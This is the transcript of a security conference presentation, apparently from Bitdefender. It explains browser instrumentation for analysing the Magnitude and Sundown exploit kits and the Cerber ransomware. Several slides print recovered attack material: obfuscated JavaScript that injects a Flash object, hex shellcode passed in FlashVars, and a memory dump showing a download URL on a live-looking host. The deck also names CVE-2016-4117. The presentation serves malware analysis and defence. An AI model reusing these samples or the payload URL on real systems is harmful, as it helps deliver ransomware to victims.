Insight into Browser Instrumentation for Exploit Analysis
Explore the complex world of browser instrumentation and exploit analysis through the lens of Mihai Neagu's research at Bitdefender. Delve into the intricacies of exploit kits, malware delivery services, behavior analysis, and hidden aspects of exploit execution processes.
Download Presentation
Please find below an Image/Link to download the presentation.
The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.
E N D
Presentation Transcript
Browser Instrumentation for Exploit Analysis Mihai Neagu, Bitdefender
About Mihai Neagu Exploit research @ Bitdefender Past: Cloud-based protocols Data encryption Reverse engineering
Summary Exploit Kits Magnitude/Cerber demo The problem Browser instrumentation Sundown/Banker demo Word of advice
What Im interested in What s the Exploit Kit What s the exploit What s the malware
Behavior analysis traffic inspection HTML Compromised website Flash Selector SWF HTML Gateway Flash Dropper SWF HTML Magnitude EK landing Unknown ? Payload, Cerber EXE
Behavior analysis process activity Download+execute Flash Selector Internet Explorer Download+execute Flash Dropper Internet Explorer Unknown ? Download+execute Cerber Internet Explorer
The problem Flash Dropper has no exploit code Where is the actual exploit? How is Cerber downloaded and executed? We need more in-depth inspection
Somethings hidden Flash Dropper (Stage 1) decrypts Flash Exploit (Stage 2) in memory Calls loadBytes on the decrypted bytes Stage 2 performs the actual exploitation // decrypt ... // execute Stage 2 this.loader.loadBytes(_loc2_); We need the contents of _loc2_, the parameter of loadBytes We need memory inspection
Browser instrumentation Dynamic HTML load document.write() mshtml.dll, CElement::InjectTextOrHTML Dynamic JS load eval() jscript9.dll, Js::GlobalObject::DefaultEvalHelper Dynamic object instantiation, parameters object parameter mshtml.dll, CPropertyBag::AddProp Dynamic Flash load loadBytes() flash.dll, Loader.loadBytes Bonus Dry run block payload execution kernel32.dll, CreateProcess, WriteProcessMemory
Memory dumps analysis Decrypted JS var SFfbfv = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">'; SFfbfv = SFfbfv + '<param name="movie" value="'+ hkcgdshfkj +'" />'; SFfbfv = SFfbfv + '<param name="play" value="true"/>'; SFfbfv = SFfbfv + '<!--[if !IE]>-->'; SFfbfv = SFfbfv + '<object type="application/x-shockwave-flash" data="'+ hkcgdshfkj +'" allowScriptAccess=always width="11" height="14">';
Memory dumps analysis Flash Loader object instantiation <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32"> <param name="movie" value= /489567945678456874356487356743256.swf" /> <param name="play" value="true"/> <param name=FlashVars value="exec=9090909090909090909090909090909090909090909090909090909090909090 909090EB7133C9648B71308B760C8B761C8B5E088B " /> ... </object>
Memory dumps analysis Shellcode 0000000000: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ???????????????? ... 0000000120: D0 7A 2E 74 6D 70 00 21 21 21 21 21 21 21 21 21 Dz.tmp !!!!!!!!! ... 0000000180: 21 21 21 21 21 21 21 FF 70 C7 FD DE C0 AF DA 68 !!!!!!! p y_A_Uh 0000000190: 74 74 70 3A 2F 2F 66 76 34 2E 32 32 35 32 39 31 ttp://fv4.225291 00000001A0: 32 2E 63 6F 6D 2F 7A 2E 70 68 70 3F 69 64 3D 31 2.com/z.php?id=1 00000001B0: 33 33 00 00 00 00 33
Memory dumps analysis Flash Exploit, actual exploitation public dynamic class Data4 extends DeleteRangeTimelineOperation public static var flash78:Placement; Vulnerability identified CVE-2016-4117 (Flash type confusion)
Word of advice Use modern mitigations Use modern mitigations Windows 10 control flow guard Chrome, Edge powerful sandboxing features Also use these Also use these AdBlock block malvertising Backup restore encrypted files